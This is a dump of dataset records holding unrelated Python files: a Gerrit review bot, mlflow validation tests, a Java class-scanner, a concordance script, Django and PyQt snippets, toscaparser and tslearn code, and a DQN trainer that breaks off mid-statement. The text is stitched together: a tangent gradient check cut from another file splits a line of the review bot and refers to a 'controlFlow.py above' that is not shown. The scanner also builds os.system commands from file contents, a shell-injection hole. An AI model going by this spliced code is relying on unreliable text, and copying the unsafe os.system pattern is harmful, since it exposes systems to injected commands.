str(ReviewType.FIXES_REF): 0,\n str(ReviewType.KCONFIG_CHANGE): 0,\n str(ReviewType.IN_MAINLINE): 0,\n str(ReviewType.UPSTREAM_COMMENTS): 0 }\n\n def inc_stat(self, review_type):\n if self.args.dry_run:\n return\n key = str(review_type)\n if not self.stats.get(key):\n self.stats[key] = 1\n else:\n self.stats[key] += 1\n\n def do_review(self, change, review):\n print('Review for change: {}'.format(change.url()))\n print(' Issues: {}, Feedback: {}, Vote:{}, Notify:{}'.format(\n review.issues.keys(), review.feedback.keys(), review.vote,\n review.notify))\n\n if review.dry_run:\n print(review.generate_review_message())\n if review.inline_comments:\n print('')\n print('-- Inline comments:')\n for f,comments in review.inline_comments.items():\n for c in comments:\n print('{}:{}'.format(f, c['line']))\n print(c['message'])\n\n print('------')\n return\n\n for i in review.issues:\n self.inc_stat(i)\n for f in review.feedback:\n self.inc_stat(f)\n self.gerrit.review(change, self.tag, review.generate_review_message(),\n review.notify, vote_code_review=review.vote,\n inline_comments=review.inline_comments)\n\n def get_changes(self, prefix):\n message = '{}:'.format(prefix)\n after = datetime.date.today() - datetime.timedelta(days=5)\n changes = 
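A finite-difference sanity check of the piecewise derivative that tangent.grad produces in controlFlow.py above, written in plain Python with no tangent dependency:

def f(x):
    a = x ** 2.0 if x > 0 else -x
    return a * a

def num_grad(func, x, h=1e-6):
    # central-difference approximation of d(func)/dx
    return (func(x + h) - func(x - h)) / (2 * h)

print(num_grad(f, 2.0))   # ~32.0: f(x) = x**4 for x > 0, and 4 * 2**3 = 32
print(num_grad(f, -3.0))  # ~-6.0: f(x) = x**2 for x < 0, and 2 * (-3) = -6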
self.gerrit.query_changes(status='open', message=message,\n after=after, project='chromiumos/third_party/kernel')\n return changes\n\n def add_change_to_blacklist(self, change):\n self.blacklist[change.number] = change.current_revision.number\n\n def is_change_in_blacklist(self, change):\n return self.blacklist.get(change.number) == change.current_revision.number\n\n def process_changes(self, changes):\n rev = Reviewer(git_dir=self.args.git_dir, verbose=self.args.verbose,\n chatty=self.args.chatty)\n ret = 0\n for c in changes:\n if self.args.verbose:\n print('Processing change {}'.format(c.url()))\n\n force_review = self.args.force_cl or self.args.force_all\n\n days_since_last_review = None\n if not force_review:\n for m in c.messages:\n if m.tag == self.tag and m.revision_num == c.current_revision.number:\n days_since_last_review = (datetime.datetime.utcnow() - m.date).days\n\n if self.args.verbose and days_since_last_review != None:\n print(' Reviewed {} days ago'.format(days_since_last_review))\n\n # Find a reviewer and blacklist if not found\n reviewer = None\n if FromlistChangeReviewer.can_review_change(c, days_since_last_review):\n reviewer = FromlistChangeReviewer(rev, c, self.args.dry_run)\n elif FromgitChangeReviewer.can_review_change(c, days_since_last_review):\n reviewer = FromgitChangeReviewer(rev, c, self.args.dry_run,\n days_since_last_review)\n elif UpstreamChangeReviewer.can_review_change(c, days_since_last_review):\n reviewer = UpstreamChangeReviewer(rev, c, self.args.dry_run)\n elif self.args.kconfig_hound and \\\n ChromiumChangeReviewer.can_review_change(c, days_since_last_review):\n reviewer = ChromiumChangeReviewer(rev, c, self.args.dry_run,\n self.args.verbose)\n if not reviewer:\n self.add_change_to_blacklist(c)\n continue\n\n if not force_review and self.is_change_in_blacklist(c):\n continue\n\n result = reviewer.review_patch()\n if result:\n self.do_review(c, result)\n ret += 1\n\n self.add_change_to_blacklist(c)\n\n return ret\n\n def update_stats(self):\n if not self.args.dry_run and self.args.stats_file:\n with open(self.args.stats_file, 'wt') as f:\n json.dump(self.stats, f)\n print('--')\n summary = ' Summary: '\n total = 0\n for k,v in self.stats.items():\n summary += '{}={} '.format(k,v)\n total += v\n summary += 'total={}'.format(total)\n print(summary)\n print('')\n\n def run(self):\n if self.args.force_cl:\n c = self.gerrit.get_change(self.args.force_cl, self.args.force_rev)\n print('Force reviewing change {}'.format(c))\n self.process_changes([c])\n return\n\n if self.args.stats_file:\n try:\n with open(self.args.stats_file, 'rt') as f:\n self.stats = json.load(f)\n except FileNotFoundError:\n self.update_stats()\n\n prefixes = ['UPSTREAM', 'BACKPORT', 'FROMGIT', 'FROMLIST']\n if self.args.kconfig_hound:\n prefixes += ['CHROMIUM']\n\n if self.args.force_prefix:\n prefixes = [self.args.force_prefix]\n\n while True:\n try:\n did_review = 0\n for p in prefixes:\n changes = self.get_changes(p)\n if self.args.verbose:\n print('{} changes for prefix {}'.format(len(changes), p))\n did_review += self.process_changes(changes)\n if did_review > 0:\n self.update_stats()\n if not self.args.daemon:\n break\n if self.args.verbose:\n print('Finished! 
Going to sleep until next run')\n\n except (requests.exceptions.HTTPError, OSError) as e:\n sys.stderr.write('Error getting changes: ({})\\n'.format(str(e)))\n time.sleep(60)\n\n time.sleep(120)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Troll gerrit reviews')\n parser.add_argument('--git-dir', default=None, help='Path to git directory')\n parser.add_argument('--verbose', help='print commits', action='store_true')\n parser.add_argument('--chatty', help='print diffs', action='store_true')\n parser.add_argument('--daemon', action='store_true',\n help='Run in daemon mode, for continuous trolling')\n parser.add_argument('--dry-run', action='store_true', default=False,\n help='skip the review step')\n parser.add_argument('--force-cl', default=None, help='Force review a CL')\n parser.add_argument('--force-rev', default=None,\n help=('Specify a specific revision of the force-cl to '\n 'review (ignored if force-cl is not true)'))\n parser.add_argument('--force-all', action='store_true', default=False,\n help='Force review all (implies dry-run)')\n parser.add_argument('--force-prefix', default=None,\n help='Only search for the provided prefix')\n parser.add_argument('--stats-file', default=None, help='Path to stats file')\n parser.add_argument('--kconfig-hound', default=None, action='store_true',\n help='Compute and post the total difference for kconfig changes')\n args = parser.parse_args()\n\n if args.force_all:\n args.dry_run = True\n\n troll = Troll('https://chromium-review.googlesource.com', args)\n troll.run()\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"troll-o-matic.py","file_name":"troll-o-matic.py","file_ext":"py","file_size_in_byte":7952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"479315652","text":"import copy\nimport pytest\n\nimport mlflow\nfrom mlflow.exceptions import MlflowException\nfrom mlflow.entities import Metric, Param, RunTag\nfrom mlflow.protos.databricks_pb2 import ErrorCode, INVALID_PARAMETER_VALUE\nfrom mlflow.utils.validation import (\n _is_numeric,\n _validate_metric_name,\n _validate_param_name,\n _validate_tag_name,\n _validate_run_id,\n _validate_batch_log_data,\n _validate_batch_log_limits,\n _validate_experiment_artifact_location,\n _validate_db_type_string,\n _validate_experiment_name,\n)\n\nGOOD_METRIC_OR_PARAM_NAMES = [\n \"a\",\n \"Ab-5_\",\n \"a/b/c\",\n \"a.b.c\",\n \".a\",\n \"b.\",\n \"a..a/._./o_O/.e.\",\n \"a b/c d\",\n]\nBAD_METRIC_OR_PARAM_NAMES = [\n \"\",\n \".\",\n \"/\",\n \"..\",\n \"//\",\n \"a//b\",\n \"a/./b\",\n \"/a\",\n \"a/\",\n \":\",\n \"\\\\\",\n \"./\",\n \"/./\",\n]\n\n\ndef test_is_numeric():\n assert _is_numeric(0)\n assert _is_numeric(0.0)\n assert not _is_numeric(True)\n assert not _is_numeric(False)\n assert not _is_numeric(\"0\")\n assert not _is_numeric(None)\n\n\ndef test_validate_metric_name():\n for good_name in GOOD_METRIC_OR_PARAM_NAMES:\n _validate_metric_name(good_name)\n for bad_name in BAD_METRIC_OR_PARAM_NAMES:\n with pytest.raises(MlflowException, match=\"Invalid metric name\") as e:\n _validate_metric_name(bad_name)\n assert e.value.error_code == ErrorCode.Name(INVALID_PARAMETER_VALUE)\n\n\ndef test_validate_param_name():\n for good_name in GOOD_METRIC_OR_PARAM_NAMES:\n _validate_param_name(good_name)\n for bad_name in BAD_METRIC_OR_PARAM_NAMES:\n with pytest.raises(MlflowException, match=\"Invalid parameter name\") as e:\n _validate_param_name(bad_name)\n assert e.value.error_code == 
ErrorCode.Name(INVALID_PARAMETER_VALUE)\n\n\ndef test_validate_tag_name():\n for good_name in GOOD_METRIC_OR_PARAM_NAMES:\n _validate_tag_name(good_name)\n for bad_name in BAD_METRIC_OR_PARAM_NAMES:\n with pytest.raises(MlflowException, match=\"Invalid tag name\") as e:\n _validate_tag_name(bad_name)\n assert e.value.error_code == ErrorCode.Name(INVALID_PARAMETER_VALUE)\n\n\ndef test_validate_run_id():\n for good_id in [\n \"a\" * 32,\n \"f0\" * 16,\n \"abcdef0123456789\" * 2,\n \"a\" * 33,\n \"a\" * 31,\n \"a\" * 256,\n \"A\" * 32,\n \"g\" * 32,\n \"a_\" * 32,\n \"abcdefghijklmnopqrstuvqxyz\",\n ]:\n _validate_run_id(good_id)\n for bad_id in [\"a/bc\" * 8, \"\", \"a\" * 400, \"*\" * 5]:\n with pytest.raises(MlflowException, match=\"Invalid run ID\") as e:\n _validate_run_id(bad_id)\n assert e.value.error_code == ErrorCode.Name(INVALID_PARAMETER_VALUE)\n\n\ndef test_validate_batch_log_limits():\n too_many_metrics = [Metric(\"metric-key-%s\" % i, 1, 0, i * 2) for i in range(1001)]\n too_many_params = [Param(\"param-key-%s\" % i, \"b\") for i in range(101)]\n too_many_tags = [RunTag(\"tag-key-%s\" % i, \"b\") for i in range(101)]\n\n good_kwargs = {\"metrics\": [], \"params\": [], \"tags\": []}\n bad_kwargs = {\n \"metrics\": [too_many_metrics],\n \"params\": [too_many_params],\n \"tags\": [too_many_tags],\n }\n match = r\"A batch logging request can contain at most \\d+\"\n for arg_name, arg_values in bad_kwargs.items():\n for arg_value in arg_values:\n final_kwargs = copy.deepcopy(good_kwargs)\n final_kwargs[arg_name] = arg_value\n with pytest.raises(MlflowException, match=match):\n _validate_batch_log_limits(**final_kwargs)\n # Test the case where there are too many entities in aggregate\n with pytest.raises(MlflowException, match=match):\n _validate_batch_log_limits(too_many_metrics[:900], too_many_params[:51], too_many_tags[:50])\n # Test that we don't reject entities within the limit\n _validate_batch_log_limits(too_many_metrics[:1000], [], [])\n _validate_batch_log_limits([], too_many_params[:100], [])\n _validate_batch_log_limits([], [], too_many_tags[:100])\n\n\ndef test_validate_batch_log_data():\n metrics_with_bad_key = [\n Metric(\"good-metric-key\", 1.0, 0, 0),\n Metric(\"super-long-bad-key\" * 1000, 4.0, 0, 0),\n ]\n metrics_with_bad_val = [Metric(\"good-metric-key\", \"not-a-double-val\", 0, 0)]\n metrics_with_bool_val = [Metric(\"good-metric-key\", True, 0, 0)]\n metrics_with_bad_ts = [Metric(\"good-metric-key\", 1.0, \"not-a-timestamp\", 0)]\n metrics_with_neg_ts = [Metric(\"good-metric-key\", 1.0, -123, 0)]\n metrics_with_bad_step = [Metric(\"good-metric-key\", 1.0, 0, \"not-a-step\")]\n params_with_bad_key = [\n Param(\"good-param-key\", \"hi\"),\n Param(\"super-long-bad-key\" * 1000, \"but-good-val\"),\n ]\n params_with_bad_val = [\n Param(\"good-param-key\", \"hi\"),\n Param(\"another-good-key\", \"but-bad-val\" * 1000),\n ]\n tags_with_bad_key = [\n RunTag(\"good-tag-key\", \"hi\"),\n RunTag(\"super-long-bad-key\" * 1000, \"but-good-val\"),\n ]\n tags_with_bad_val = [\n RunTag(\"good-tag-key\", \"hi\"),\n RunTag(\"another-good-key\", \"but-bad-val\" * 1000),\n ]\n bad_kwargs = {\n \"metrics\": [\n metrics_with_bad_key,\n metrics_with_bad_val,\n metrics_with_bool_val,\n metrics_with_bad_ts,\n metrics_with_neg_ts,\n metrics_with_bad_step,\n ],\n \"params\": [params_with_bad_key, params_with_bad_val],\n \"tags\": [tags_with_bad_key, tags_with_bad_val],\n }\n good_kwargs = {\"metrics\": [], \"params\": [], \"tags\": []}\n for arg_name, arg_values in bad_kwargs.items():\n 
for arg_value in arg_values:\n final_kwargs = copy.deepcopy(good_kwargs)\n final_kwargs[arg_name] = arg_value\n with pytest.raises(MlflowException, match=r\".+\"):\n _validate_batch_log_data(**final_kwargs)\n # Test that we don't reject entities within the limit\n _validate_batch_log_data(\n metrics=[Metric(\"metric-key\", 1.0, 0, 0)],\n params=[Param(\"param-key\", \"param-val\")],\n tags=[RunTag(\"tag-key\", \"tag-val\")],\n )\n\n\ndef test_validate_experiment_artifact_location():\n _validate_experiment_artifact_location(\"abcde\")\n _validate_experiment_artifact_location(None)\n with pytest.raises(MlflowException, match=\"Artifact location cannot be a runs:/ URI\"):\n _validate_experiment_artifact_location(\"runs:/blah/bleh/blergh\")\n\n\ndef test_validate_experiment_name():\n _validate_experiment_name(\"validstring\")\n bytestring = b\"test byte string\"\n _validate_experiment_name(bytestring.decode(\"utf-8\"))\n for invalid_name in [\"\", 12, 12.7, None, {}, []]:\n with pytest.raises(MlflowException, match=\"Invalid experiment name\"):\n _validate_experiment_name(invalid_name)\n\n\ndef test_validate_list_experiments_max_results():\n client = mlflow.tracking.MlflowClient()\n client.list_experiments(max_results=50)\n with pytest.raises(MlflowException, match=\"It must be at most 50000\"):\n client.list_experiments(max_results=50001)\n for invalid_num in [-12, 0]:\n with pytest.raises(MlflowException, match=\"It must be at least 1\"):\n client.list_experiments(max_results=invalid_num)\n\n\ndef test_db_type():\n for db_type in [\"mysql\", \"mssql\", \"postgresql\", \"sqlite\"]:\n # should not raise an exception\n _validate_db_type_string(db_type)\n\n # error cases\n for db_type in [\"MySQL\", \"mongo\", \"cassandra\", \"sql\", \"\"]:\n with pytest.raises(MlflowException, match=\"Invalid database engine\") as e:\n _validate_db_type_string(db_type)\n assert \"Invalid database engine\" in e.value.message\n","sub_path":"tests/utils/test_validation.py","file_name":"test_validation.py","file_ext":"py","file_size_in_byte":7632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"279656240","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport os\nimport sys\n\nfile_category = ['.java']\n\nwhite_list = []\ndef read_service_info(service_path):\n tmp_list = []\n with open(service_path) as sp:\n for line in sp:\n tmp_str = line.strip()\n tmp_list.append(tmp_str)\n return tmp_list\n\ndef for_class(file_path, object_file):\n white_list = read_service_info('./service_list.txt')\n for filename in os.listdir(file_path):\n fp = os.path.join(file_path, filename)\n if os.path.isfile(fp):\n if os.path.splitext(fp)[1] in file_category:\n if fp.split('/')[-1] not in white_list:\n# print fp\n arg0 = object_file\n arg1 = fp\n# os.system('./class_relation.sh ' + arg0 + ' ' + arg1)\n tmp_str = object_file.split('.')[0]\n with open(fp) as f:\n for line in f:\n if ((' ' + tmp_str + ' ') in line and ';' in line and '(' not in line and '//' not in line and '*' not in line) or ((' ' + tmp_str + '.') in line and '//' not in line and '*' not in line):\n if (' ' + tmp_str + '.') in line:\n key_str = line.split('.')[0].strip()\n if len(key_str.split(' ')) > 1:\n break\n# print fp + ': ' + key_str\n os.system('./class_relation.sh ' + arg0 + ' ' + arg1 + ' ' + key_str)\n break\n else:\n key_str = line.split(' ')[-1].split(';')[0] \n# print fp + ': ' + key_str\n os.system('./class_relation.sh ' + arg0 + ' ' + arg1 + ' ' + key_str)\n break\n\n elif 
os.path.isdir(fp):\n            for_class(fp, object_file)\n\nfor_class(sys.argv[1], sys.argv[2])\n","sub_path":"for_class.py","file_name":"for_class.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"100515637","text":"from word_histogram import * \r\nfrom build_word_list import *\r\n\r\ndef concordance(filename): \r\n    \r\n    infile = open(filename, \"r\")\r\n    word_list_actuall = build_word_list(filename)\r\n    concordance_dict = {} \r\n    line_number = 1\r\n    for line in infile:\r\n        \r\n        word_list = line.split()\r\n        \r\n        for word in word_list:\r\n            word = word.strip(string.punctuation).lower()\r\n\r\n            for thisword in word_list_actuall: \r\n                if thisword == word:\r\n                    if concordance_dict.get(thisword): \r\n                        value = concordance_dict[thisword]\r\n                        value.append(line_number)\r\n                        concordance_dict[thisword] = value\r\n                    \r\n                    else:\r\n                        new_value = []\r\n                        new_value.append(line_number)\r\n                        concordance_dict[thisword] = new_value\r\n            \r\n        line_number += 1  \r\n        \r\n    #remove duplicate occurrences\r\n    for key in concordance_dict:\r\n        concordance_dict[key] = list(set(concordance_dict[key]))\r\n    \r\n    \r\n    return concordance_dict  \r\n    \r\n\r\ndef print_sorted_dict(dictionary):  \r\n    \r\n    sorted_keys = sorted(dictionary)\r\n    \r\n    for key in sorted_keys:\r\n        print(key, \" : \", dictionary[key])\r\n    \r\n\r\nprint_sorted_dict(concordance(\"sons_of_martha.txt\"))","sub_path":"old/labs/Lab 10 Better/concordance (1).py","file_name":"concordance (1).py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"244525877","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('parafagile', '0009_auto_20161115_1425'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='organization',\n            name='avatar',\n            field=models.URLField(default='https://avatars2.githubusercontent.com/u/16116810?v=3&s=200'),\n            preserve_default=False,\n        ),\n        migrations.AlterField(\n            model_name='organization',\n            name='type',\n            field=models.CharField(max_length=15, choices=[(b'ORG', b'Organization'), (b'USR', b'User')]),\n        ),\n    ]\n","sub_path":"app/parafagile/migrations/0010_auto_20170101_1116.py","file_name":"0010_auto_20170101_1116.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"494195736","text":"from PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nimport sys\n\n__appname__ = \"File Dialog\"\n\nclass Program(QDialog):\n    def __init__(self, parent=None):\n        super(Program, self).__init__(parent)\n\n        openButton = QPushButton(\"Open\")\n        saveButton = QPushButton(\"Save\")\n        dirButton = QPushButton(\"Other\")\n        closeButton = QPushButton(\"Close...\")\n\n        openButton.clicked.connect(self.open)\n        saveButton.clicked.connect(self.save)\n\n        layout = QVBoxLayout()\n        layout.addWidget(openButton)\n        layout.addWidget(saveButton)\n        layout.addWidget(dirButton)\n        layout.addWidget(closeButton)\n\n        self.setLayout(layout)\n\n    def open(self):\n        dirname = \".\"\n        # In PyQt5, getOpenFileName returns a (filename, selected_filter) tuple\n        # (PyQt4 returned a bare QString), so index [0] below extracts the path\n        fileObj = QFileDialog.getOpenFileName(self, \"Please select your file - \" + __appname__, dirname, filter=\"Text files (*.txt)\")\n        filename = fileObj[0]\n        file = open(filename, \"r\")\n        read = file.read()\n        
file.close()\n\n def save(self):\n dirname = \".\"\n fileObj = QFileDialog.getSaveFileName(self, __appname__, dirname, filter=\"Text files (*.txt)\")\n fileName = fileObj[0]\n contents = \"File text to be saved\"\n open(fileName, \"w\").write(contents)\n print(fileName)\n\napp = QApplication(sys.argv)\nform = Program()\nform.show()\napp.exec_()","sub_path":"Dialogs/FileDialog.py","file_name":"FileDialog.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"93310714","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib import messages \nfrom models import * \nimport bcrypt\n\n\ndef index(request):\n request.session.clear()\n return render(request, ('login/index.html'))\n\n\ndef process(request):\n if request.method == 'POST':\n errors = User.objects.basic_validator(request.POST)\n if len(errors):\n for tag, error in errors.iteritems():\n messages.error(request, error, extra_tags=tag)\n return redirect('/')\n else:\n hash1 = bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt())\n request.session['name'] = request.POST['first_name']\n User.objects.create(first_name=request.POST['first_name'], last_name=request.POST['last_name'], email=request.POST['email'], password=hash1) \n u = User.objects.get(email=request.POST['email'])\n request.session['id'] = u.id\n return redirect('/books')\n\n\ndef login(request):\n if request.method == 'POST':\n errors = User.objects.login_validator(request.POST)\n if len(errors):\n for tag, error in errors.iteritems():\n messages.error(request, error, extra_tags=tag)\n return redirect('/')\n else:\n u = User.objects.get(email=request.POST['email'])\n request.session['id'] = u.id\n request.session['name'] = u.first_name\n return redirect ('/books')\n\n\n\ndef success(request):\n if 'id' not in request.session:\n return redirect('/')\n else:\n return render(request, ('login/books.html'))\n\n\ndef add(request):\n if 'id' not in request.session:\n return redirect('/')\n return render(request, ('login/add.html'))","sub_path":"Python/django/belt_reviewer/apps/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"11292473","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom toscaparser.elements.property_definition import PropertyDef\nfrom toscaparser.elements.statefulentitytype import StatefulEntityType\n\n\nclass CapabilityType(StatefulEntityType):\n '''TOSCA built-in capabilities type.'''\n TOSCA_TYPEURI_CAPABILITY_ROOT = 'tosca.capabilities.Root'\n\n def __init__(self, name, ctype, ntype, custom_def=None):\n self.name = name\n super(CapabilityType, self).__init__(ctype, self.CAPABILITY_PREFIX,\n custom_def)\n self.nodetype = ntype\n self.properties = None\n self.custom_def = custom_def\n if self.PROPERTIES in self.defs:\n self.properties = self.defs[self.PROPERTIES]\n\n @property\n def parent_type(self):\n '''Return a capability this capability is derived from.'''\n if not hasattr(self, 'defs'):\n return None\n pnode = self.derived_from(self.defs)\n if pnode:\n return CapabilityType(self.name, pnode,\n self.nodetype, self.custom_def)\n\n def inherits_from(self, type_names):\n '''Check this capability is in type_names\n\n Check if this capability or some of its parent types\n are in the list of types: type_names\n '''\n if self.type in type_names:\n return True\n elif self.parent_type:\n return self.parent_type.inherits_from(type_names)\n else:\n return False\n","sub_path":"toscaparser/elements/capabilitytype.py","file_name":"capabilitytype.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"347655358","text":"from sklearn.base import TransformerMixin\n\nfrom tslearn.utils import npy3d_time_series_dataset\n\n__author__ = 'Romain Tavenard romain.tavenard[at]univ-rennes2.fr'\n\n\nclass TimeSeriesScalerMinMax(TransformerMixin):\n \"\"\"Scaler for time series. Scales time series so that their span in each dimension is between ``min`` and ``max``.\n \n Example\n -------\n >>> TimeSeriesScalerMinMax(min=1., max=2.).fit_transform([[0, 3, 6]]) # doctest: +NORMALIZE_WHITESPACE\n array([[[ 1. ],\n [ 1.5],\n [ 2. ]]])\n \"\"\"\n def __init__(self, min=0., max=1.):\n self.min_ = min\n self.max_ = max\n\n def fit_transform(self, X):\n \"\"\"Fit to data, then transform it.\n\n Parameters\n ----------\n X\n Time series dataset to be rescaled\n\n Returns\n -------\n numpy.ndarray\n Rescaled time series dataset\n \"\"\"\n X_ = npy3d_time_series_dataset(X)\n for i in range(X_.shape[0]):\n for d in range(X_.shape[2]):\n cur_min = X_[i, :, d].min()\n cur_max = X_[i, :, d].max()\n cur_range = cur_max - cur_min\n X_[i, :, d] = (X_[i, :, d] - cur_min) * (self.max_ - self.min_) / cur_range + self.min_\n return X_\n\n\nclass TimeSeriesScalerMeanVariance(TransformerMixin):\n \"\"\"Scaler for time series. Scales time series so that their mean (resp. variance) in each dimension is ``mu``\n (resp. ``std``).\n \n Example\n -------\n >>> TimeSeriesScalerMeanVariance(mu=0., std=1.).fit_transform([[0, 3, 6]]) # doctest: +NORMALIZE_WHITESPACE\n array([[[-1.22474487],\n [ 0. 
],\n [ 1.22474487]]])\n \"\"\"\n def __init__(self, mu=0., std=1.):\n self.mu_ = mu\n self.std_ = std\n\n def fit_transform(self, X):\n \"\"\"Fit to data, then transform it.\n \n Parameters\n ----------\n X\n Time series dataset to be rescaled\n\n Returns\n -------\n numpy.ndarray\n Rescaled time series dataset\n \"\"\"\n X_ = npy3d_time_series_dataset(X)\n for i in range(X_.shape[0]):\n for d in range(X_.shape[2]):\n cur_mean = X_[i, :, d].mean()\n cur_std = X_[i, :, d].std()\n X_[i, :, d] = (X_[i, :, d] - cur_mean) * self.std_ / cur_std + self.mu_\n return X_\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"tslearn/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"172632239","text":"import sys\nimport time\nfrom datetime import datetime\nfrom collections import deque, Counter\nimport numpy as np\n\nsys.path.append('../')\nfrom utils import get_random\nfrom config import get_opt\nfrom visualizer import CurrentStateVisualizer, EvaluationVisualizer, QValueVisualizer\n\ndef get_device_name(opt):\n if opt.gpu >= 0:\n return '/gpu:{}'.format(opt.gpu)\n else:\n return None\n\ndef train_main(game_env, agent, game_actions, opt):\n\n learn_start = opt.learn_start\n start_time = time.time()\n time_history = deque(maxlen=10)\n reward_history = []\n step = 0\n num_epi = 0\n num_frame = 0\n time_history.append(0)\n cur_epi_count = 0\n cur_epi_reward = 0\n cur_total_epi_reward = 0\n cur_total_epi_count = 0\n total_epi_reward = 0\n max_epi_reward = 0\n total_max_reward = 0\n action_index = 0\n current_state_visualizer = CurrentStateVisualizer(opt)\n eval_visualizer = EvaluationVisualizer(opt)\n q_value_visualizer = QValueVisualizer(opt)\n \n\n get_random().manualSeed(1)\n\n screen, reward, terminal, info = game_env.getState();\n\n start_datetime = datetime.now()\n \n last_screen = None\n\n print(\"Iteration ..\", opt.steps, start_datetime.strftime('%Y-%m-%d %H:%M:%S'))\n while step < opt.steps:\n step += 1\n\n if opt.render:\n game_env.render()\n\n action_index = agent.perceive(screen, reward, terminal, testing=False, testing_ep=None)\n\n if not terminal:\n screen, reward, terminal, info = game_env.step(game_actions[action_index], training=opt.step_train_mode)\n\n cur_epi_reward += reward\n if 'frameskip' in info:\n num_frame += info['frameskip']\n else:\n num_frame += np.mean(opt.actrep) if isinstance(opt.actrep, tuple) else opt.actrep\n else:\n num_epi += 1\n cur_epi_count += 1\n cur_total_epi_reward += cur_epi_reward\n max_epi_reward = max(max_epi_reward, cur_epi_reward)\n cur_epi_reward = 0\n\n if opt.random_starts > 0 :\n screen, reward, terminal, info = game_env.nextRandomGame()\n else:\n screen, reward, terminal, info = game_env.newGame()\n\n\n if step % opt.prog_freq == 0 :\n assert step==agent.numSteps, 'trainer step: {0} & agent.numSteps: {1}'.format(step,agent.numSteps)\n print('------------------------------------------------')\n cur_avg_epi_reward = max(cur_total_epi_reward, cur_epi_reward) / max(1, cur_epi_count)\n cur_total_epi_count = cur_total_epi_count + cur_epi_count\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), \"Steps: \", step, \"epsilon:{:.2f}\".format(agent.ep), \"Episodes:\", num_epi, 'total_epi_reward:', cur_total_epi_reward, 'max_epi_reward:', max_epi_reward, 'avg_epi_reward:{:.2f}'.format(cur_avg_epi_reward))\n current_state = dict(\n average_episode_scores = cur_avg_epi_reward,\n 
episode_count = cur_total_epi_count,\n epsilon = agent.ep\n )\n current_state_visualizer.addCurrentState(current_state)\n current_state_visualizer.flush(step)\n \n cur_epi_reward = 0\n cur_total_epi_reward = 0\n cur_epi_count = 0\n max_epi_reward = 0\n\n if step % opt.eval_freq == 0 and step > learn_start:\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'step[{}] eval start'.format(step))\n\n total_reward = 0\n nrewards = 0\n nepisodes = 0\n episode_reward = 0\n eval_frames = 0\n score_list = []\n eval_time = time.time()\n\n game_env.start_recording(step, q_value_visualizer)\n\n screen, reward, terminal, info = game_env.newGame()\n \n for estep in range(opt.eval_steps):\n\n action = agent.perceive(screen, reward, terminal, testing=True, testing_ep=0.05)\n\n q_value_visualizer.collect_q_value(agent.q)\n\n # Play game in test mode (episodes don't end when losing a life)\n screen, reward, terminal, info = game_env.step(game_actions[action], training=False)\n\n if 'frameskip' in info:\n eval_frames += info['frameskip']\n else:\n eval_frames += opt.actrep\n\n if terminal:\n print('episode:{} score:{}'.format(game_env.episode_id, game_env.episode_score))\n screen, reward, terminal, info = game_env.nextRandomGame()\n \n \n if estep % opt.prog_freq == 0 :\n print('eval steps {0}/{1}'.format(estep, opt.eval_steps))\n \n game_env.stop_recording()\n\n total_reward = sum(game_env.get_episode_scores())\n nepisodes = game_env.get_num_episode()\n avg_epi_reward = np.mean(game_env.get_episode_scores())\n \n eval_time = time.time() - eval_time\n start_time += eval_time\n agent.compute_validation_statistics()\n \n eval_values = dict(episode_score=np.array(game_env.get_episode_scores()), episode_count=nepisodes)\n valid_values = dict(TDerror=agent.tderr_avg, V=agent.v_avg)\n eval_visualizer.addEvaluation(eval_values)\n eval_visualizer.addValidation(valid_values)\n eval_visualizer.flush(step)\n\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'V {0} TD error {1} Qmax {2}'.format(agent.v_avg, agent.tderr_avg, agent.q_max))\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'episode_count:{0} total_epi_reward:{1:d} avg_epi_reward:{2:.2f}'.format(nepisodes, int(total_reward), total_reward / nepisodes))\n \n reward_history.append(total_reward)\n \n time_history.append(time.time() - start_time)\n \n last_idx = 0\n time_dif = 0\n\n training_rate = 0\n \n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n 'Steps: {0} (frames: {1}), reward: {2:.2f}, epsilon: {3:.2f}, lr:{4:.5f}, training time: {5}s, training rate: {6}fps, testing time: {7}s testing rate: {8}fps, num. ep.: 